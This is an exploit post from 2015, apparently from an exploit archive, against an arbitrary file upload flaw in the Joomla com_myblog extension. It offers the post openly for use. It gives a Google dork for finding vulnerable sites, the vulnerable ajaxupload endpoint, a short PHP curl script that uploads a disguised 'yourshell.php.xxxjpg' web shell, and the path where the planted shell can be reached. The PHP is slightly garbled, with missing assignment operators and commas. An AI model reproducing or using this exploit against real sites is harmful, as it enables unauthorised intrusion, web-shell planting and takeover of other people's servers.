facebook facebook twitter rss

Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability

Author: Back-DOOR , Published: 24-07-2015
==================================================================



[+] Title : Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability



----------------------------------------------------



[+] Vendor : http://extensions.joomla.org/extension/easyblog





[+] Author : Back-DOOR



----------------------------------------------------

[+] Date : 20 / 7 / 2015

[+] Time : 22:00

----------------------------------------------------



[+] Exploit by : Back-DOOR



----------------------------------------------------



[+] Contact : https://facebook.com/Backdoor.ma

[+] Like : https://fb.com/BaCkDoOr.HaCkInG

youtube chaine : https://www.youtube.com/user/BackDOOR8100/videos

----------------------------------------------------



[+] Dork google : inurl:/components/com_myblog/



[+] Dork google : (use your Mind Noob)



====================================================

exploit Vul : /index.php?option=com_myblog&task=ajaxupload

Vuln code : {error: 'No file has been uploaded.', msg: '' }

Exploiter :D :

<?php
$uploadfile
="yourshell.php.xxxjpg";
$ch curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($chCURLOPT_POSTtrue); 
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'fileToUpload'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>



Shell acces :
/images/yourshell.php.xxxjpg

Like us on Facebook :